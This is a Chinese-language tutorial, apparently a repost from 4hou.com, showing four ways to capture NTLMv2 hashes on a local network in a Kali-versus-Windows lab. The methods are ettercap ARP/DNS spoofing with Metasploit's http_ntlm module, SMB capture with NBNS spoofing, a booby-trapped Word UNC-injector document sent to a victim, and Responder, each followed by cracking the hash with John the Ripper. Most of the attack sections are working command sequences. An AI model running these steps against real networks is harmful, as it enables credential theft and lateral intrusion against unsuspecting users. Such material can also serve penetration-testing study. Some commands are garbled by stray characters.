實用教程：從網路中獲取NTLM Hash的四種方法

大家好，今天我給大家展示下如何在本地網路中捕獲到NTLM Hash，本文我就為大家介紹四種不同的方法。開始講述攻擊技術之前，我們先了解下NTLM Hash吧。

NTLM這一名詞是由以下單詞的首字母拼湊而成的:

NT:New technologies(windows的新技術)

LAN:本地區域網(Local area network)

M:管理者(Manager)

在一個windows網路中，NTLM是一套Microsoft安全協議。Windows NT 4.0操作系統中的網路身份驗證默認為用戶提供身份驗證，完整性和機密性。 NTLMv2是最新版本，並使用基於NT MD4的單向功能。哈希長度為128位，適用於本地帳戶和域帳戶。

NTLM協議使用兩個散列密碼值中的一個或兩個，這兩個值也存儲在伺服器（或域控制器）上，並且兩個hash值加的鹽都是等效的，這意味著如果從伺服器獲取哈希值，就可以在不知道實際密碼的情況下進行身份驗證。

如果還想了解更多關於NTLM的信息，可以通過http://wikipedia.org了解到。

那麼現在就讓我們開始試驗吧。

環境:

攻擊機：Kali Linux

靶機: Windows 10

通過嗅探捕獲NTLMv2hash值

首先在kali中的/etc/ettercap目錄下將etter.dns中的內容全部刪除，然後在裡面寫入以下格式的攻擊者IP,然後保存文檔。

* A 192.168.1.103n

接下來按照下方步驟打開ettercap，進行嗅探。

1. Application -> sniffing and spoofing > ettercapn2. 點擊Sniff然後選擇你的網卡n3. 點擊Scan for host 去生成攻擊列表n

選擇攻擊主機，添加目標，下方給出的圖片中你可以看到我選擇了192.168.1.101作為攻擊目標，並且加入到了target1中。

在菜單中點擊MITM，選擇ARP poisoning，然後在彈出的框啟用」sniff remote connects」，點擊ok。

在菜單欄中繼續點擊plugin(插件)這一選項，然後選擇dns_spoof.

通過使用dns_spoof攻擊者可以使區域網內的流量全部經過本地，那麼無論靶機通過瀏覽器訪問什麼網頁，都會重定向到攻擊者IP上面。

現在打開msf，然後執行下方代碼使用http_ntlm模塊。這一模塊可以獲取到NTLM/LM hash。

use auxiliary/server/capture/http_ntlmnmsf auxiliary(http_ntlm) > set srvhost 192.168.1.103nmsf auxiliary(http_ntlm) > set SRVPORT 80nmsf auxiliary(http_ntlm) > set URIPATH /nmsf auxiliary(http_ntlm) > set JOHNPWFILE /root/Desktop/nmsf auxiliary(http_ntlm) > exploitn

執行完上述的步驟，當靶機中訪問http網頁時，在msf中就會捕獲到靶機系統的NTLM密碼。

在下方圖片中你可以觀察到靶機正在嘗試訪問」hackingarticles.in」這一網站，但是在訪問過程中跳出了要輸入賬號密碼的驗證頁面。現在他無論打開任何網址，都會跳出來這樣的驗證頁面。如果他不輸入賬號密碼，這一頁面會一直出現在他的瀏覽器中。

如果靶機輸入了他的賬號密碼，攻擊者就可以在後台捕獲到系統中的NTLM hash值。

太棒了，攻擊者已經獲取到了NTLMhash值，現在讓我們看看我們捕獲到的具體信息。

從給出的圖片中你可以看到攻擊者還獲得兩個額外的信息：

用戶名：pentest

機器名：Desktop-UKIQM20

現在執行john_netntlmv2命令通過john ripper破解ntlm2 hash。

從下圖中你可以看到已經成功的破解了之前獲得的hash值:」password:123」。

通過捕獲SMB流量以及欺騙NBNS對NTLM2 hash進行獲取

這一部分會在機器上啟動一個smb服務，用於獲得SMB客戶端系統的」挑戰／應答」協議的密碼hash。這一服務的響應是使用的默認的挑戰字元串」x11x22x33x44x55x66x77x88」,可以使用Cain,Abel,L0phtcrack或者John the ripper進行破解。為了達到這一目的，攻擊者必須嘗試對這一模塊進行驗證。

use auxiliary/server/capture/smbnmsf auxiliary(smb) > set srvhost 192.168.1.103nmsf auxiliary(smb) > set JOHNPWFILE /tmp/john_smbnmsf auxiliary(smb) > exploitn

同時在捕獲smb模塊下執行NBNS_response模塊。

這一模塊偽造NetBIOS名稱服務(NBNS)響應。他會偵聽發送到本地網卡的NBNS請求，並且返回一個偽造的響應，將正在請求的這一機器重定向到攻擊者選擇的IP。與auxiliary/server/capture/smb或者auxiliary/server/capture/http_ntlm結合，就大大提高在公眾網路中收集可破解hash的效率。這一模塊需要的是root許可權，並且綁定在所有網卡的udp/137埠上。

use auxiliary/spoof/nbns/nbns_responsenmsf auxiliary(nbns_response) > set SPOOFIP 1192.168.1.103nmsf auxiliary(nbns_response) > set INTERFACE eth0nmsf auxiliary(nbns_response) >exploitn

這一模塊會在受害者系統上生成一個假的安全提示窗口，建立與另外一個系統的連接，以便訪問該系統的共享文件夾。

我們使用nmap對本地udp以及tcp埠進行掃描，下圖中你可以發現NETBIOS對應的137埠已經開放。

現在當靶機嘗試訪問共享文件夾時，他將通過他的網路IP與攻擊者進行連接。下圖中是證明受害諍正在連接攻擊者IP:192.168.1.103的證明。

訪問到共享文件夾時，他會看到一個假的安全提示窗口，會要求受害者輸入他的用戶名和密碼進行訪問共享文件夾。

攻擊者再次獲得了NTMLv2 hash。從下圖中可以看到，攻擊者還獲得了兩個額外的信息。

用戶名：pentest

機器名：Desktop-UKIQM20

再一次使用john_netntlmv2命令對ntlmv2 hash進行破解。

通過捕獲SMB以及word UNC injector獲取NTLMv2 hash

這一模塊會修改.docx文件，一旦文件打開，他會將存儲的netNTLM憑證發送給遠程主機。它同樣可以產生一個空的docx文件。必須將這一文件打開模式為編輯模式，這樣才可以與遠程主機進行通信。預覽和只讀模式不會建立起來通信。經過確認，在word 2003，2007，2010，2013攻擊有效。

use auxiliary/docx/word_unc_injectornmsf auxiliary(word_unc_injector) >set lhost 192.168.1.103nmsf auxiliary(word_unc_injector) >exploitn

它會在/root/.msf4/local文件夾中產生一個空的word文件。

把產生的文件發送給受害者，然後像之前一樣在msf中運行smb模塊。

下圖中你可以發現auxiliary/server/capture/smb這一模塊被載入，以便獲取hash。

一旦受害者打開msf.docx文件，攻擊者那邊就會在他的系統上收到TLMv2 hash。與上述兩個方法不同的是，這一方法只是獲取到了NTLMv2Hash值，沒有其他額外的信息。

然後執行john _netntlmv2破解密碼。

Responder

Responder是一款強大並且簡單易用的內網滲透神器。由 Laurent Gaffie創建。這一工具會監聽以下埠：UDP 137, UDP 138, UDP 53, UDP/TCP 389,TCP 1433, TCP 80, TCP 139, TCP 445, TCP 21, TCP 3141,TCP 25, TCP 110, TCP 587 and Multicast UDP 5553。

現在打開一個新的命令行，執行下面命令從github下載：

git clone https://github.com/SpiderLabs/Responder.gitncd Respondern

打開文件夾然後運行python腳本：

python Responder.py –I 192.168.1.103 -I eth0n

你可以看到所有Poisoners以及服務全部打開：

現在受害者再次訪問共享文件夾，他將通過網路IP與攻擊者進行連接，下面給出的圖像顯示受害者正在連接攻擊者的IP：192.168.1.103

當受害者訪問共享文件夾時，他會得到一個假的錯誤信息，如下：

一旦攻擊者成功捕獲NTLMv2 hash值，你可以看到同樣獲得了用戶名以及機器名：

它會在/root/Desktop/Responder/logs.

然後使用john_netntlmv2進行破解，下圖顯示已經破解成功：

如若轉載，請註明原文地址： http://www.4hou.com/system/8041.html 更多內容請關注「嘶吼專業版」——Pro4hou

推薦閱讀：